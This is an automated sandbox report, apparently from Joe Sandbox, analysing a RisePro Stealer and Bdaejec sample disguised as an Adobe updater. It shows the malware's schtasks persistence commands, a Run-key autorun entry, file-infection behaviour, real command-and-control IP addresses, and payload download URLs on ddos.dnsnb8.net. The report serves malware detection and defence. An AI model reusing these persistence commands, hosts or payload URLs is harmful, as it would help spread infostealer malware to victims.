Edit tour

Windows Analysis Report
AdobeUpdaterV131.exe

Overview

General Information

Sample name:	AdobeUpdaterV131.exe
Analysis ID:	1480703
MD5:	0bfb030dcbf461f2c76087e4b9856836
SHA1:	75425a8dc79a21373520a241a7c51d9a1ce7e91a
SHA256:	bdb5f42b5e4709134a4f963b9648af4f8e19e2011937f72ff3b75488887e3f14
Tags:	exe
Infos:

Detection

Bdaejec, RisePro Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Yara detected Bdaejec

Yara detected RisePro Stealer

AI detected suspicious sample

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

AdobeUpdaterV131.exe (PID: 6616 cmdline: "C:\Users\user\Desktop\AdobeUpdaterV131.exe" MD5: 0BFB030DCBF461F2C76087E4B9856836)

xRp.exe (PID: 6568 cmdline: C:\Users\user\AppData\Local\Temp\xRp.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 7360 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776 MD5: C31336C1EFC2CCB44B4326EA793040F2)

schtasks.exe (PID: 7192 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7240 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MPGPH131.exe (PID: 7416 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 0BFB030DCBF461F2C76087E4B9856836)

MPGPH131.exe (PID: 7428 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 0BFB030DCBF461F2C76087E4B9856836)

RageMP131.exe (PID: 7848 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 0BFB030DCBF461F2C76087E4B9856836)

RageMP131.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 0BFB030DCBF461F2C76087E4B9856836)

xRp.exe (PID: 8120 cmdline: C:\Users\user\AppData\Local\Temp\xRp.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

cmd.exe (PID: 2080 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: AdobeUpdaterV131.exe PID: 6616	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: xRp.exe PID: 6568	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: MPGPH131.exe PID: 7416	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: MPGPH131.exe PID: 7428	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RageMP131.exe PID: 7848	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RageMP131.exe PID: 8104	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: xRp.exe PID: 8120	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Click to see the 12 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\AdobeUpdaterV131.exe, ProcessId: 6616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T23:02:23.672844+0200
SID:	2807908
Source Port:	49751
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.62

Timestamp:	2024-07-24T23:02:02.179085+0200
SID:	2046269
Source Port:	49732
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T23:02:21.179501+0200
SID:	2807908
Source Port:	49749
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.62

Timestamp:	2024-07-24T23:02:06.867202+0200
SID:	2046269
Source Port:	49738
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.62

Timestamp:	2024-07-24T23:02:06.867241+0200
SID:	2046269
Source Port:	49737
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.4

Timestamp:	2024-07-24T23:02:50.529437+0200
SID:	2022930
Source Port:	443
Destination Port:	49754
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T23:01:54.455790+0200
SID:	2807908
Source Port:	49730
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE RisePro TCP Heartbeat Packet - Source IP: 192.168.2.4 - Destination IP: 193.233.132.62

Timestamp:	2024-07-24T23:01:59.210478+0200
SID:	2049060
Source Port:	49732
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.4

Timestamp:	2024-07-24T23:02:13.192674+0200
SID:	2022930
Source Port:	443
Destination Port:	49745
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.62

Timestamp:	2024-07-24T23:02:24.179265+0200
SID:	2046269
Source Port:	49750
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.62

Timestamp:	2024-07-24T23:02:16.085891+0200
SID:	2046269
Source Port:	49747
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.4 - Destination IP: 20.42.73.29

Timestamp:	2024-07-24T23:02:13.348213+0200
SID:	2028371
Source Port:	49746
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T23:02:30.315987+0200
SID:	2807908
Source Port:	49753
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T23:01:59.277372+0200
SID:	2807908
Source Port:	49731
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T23:02:18.300399+0200
SID:	2807908
Source Port:	49748
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T23:02:26.815817+0200
SID:	2807908
Source Port:	49752
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-07-24T23:01:53.959653+0200
SID:	2838522
Source Port:	54770
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: AdobeUpdaterV131.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rars	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarUa	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar8	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rarsC:	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarcC:	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.raryY	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rarXY$$m	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar7	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rar?Y	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/v	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar)X	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcag$	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar1b	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarq	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$m	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarU	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rars	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarsC:	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarhg	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarMp	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rarC:	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: AdobeUpdaterV131.exe

Joe Sandbox ML: detected

Source: AdobeUpdaterV131.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		1_2_004E29E2
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		15_2_00E329E2

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Code function: 1_2_004E2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_004E2B8C

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 799

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
Source: global traffic	TCP traffic: 192.168.2.4:49732 -> 193.233.132.62:50500

Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View	IP Address: 193.233.132.62 193.233.132.62

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Code function: 0_2_0063D620 recv,WSAStartup,closesocket,socket,connect,closesocket,

0_2_0063D620

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: xRp.exe, 00000001.00000003.1658769932.0000000000520000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmp, xRp.exe, 0000000F.00000003.1890235266.0000000000B60000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: xRp.exe, 00000001.00000002.1856041634.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/v
Source: xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar1b
Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar7
Source: xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$m
Source: xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarS
